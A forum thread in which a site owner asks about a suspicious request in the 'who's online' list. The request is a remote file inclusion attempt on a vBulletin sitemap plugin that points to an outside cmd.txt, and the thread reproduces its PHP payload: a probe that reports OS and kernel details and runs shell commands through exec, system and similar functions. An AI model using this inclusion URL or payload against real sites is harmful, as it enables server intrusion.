Announcement

Collapse
No announcement yet.

What is this?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • What is this?

    Hello

    This is coming up in whos online:

    /forum/vbb/index.php/vbgsitemap/vbgsitemap-config.php?base=http://www.hendersonhideaway.net/TNG/cmd.txt?

    When looking up the url it is pointing to in a page snooper I get this:

    <?php

    echo "Mic22";
    $dir = @getcwd();
    $ker = @php_uname();
    $OS = @PHP_OS;
    echo "<br>OSTYPE:$OS<br>";
    echo "<br>Kernel:$ker<br>";
    $free = disk_free_space($dir);
    if ($free === FALSE) {$free = 0;}
    if ($free < 0) {$free = 0;}
    echo "Free:".view_size($free)."<br>";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while([email protected]($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    function view_size($size)
    {
    if (!is_numeric($size)) {return FALSE;}
    else
    {
    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
    else {$size = $size . " B";}
    return $size;
    }
    }
    exit;

  • #2
    that's a PHP code

    Comment


    • #3
      Somebody tried an exploit.

      Comment

      Related Topics

      Collapse

      Working...
      X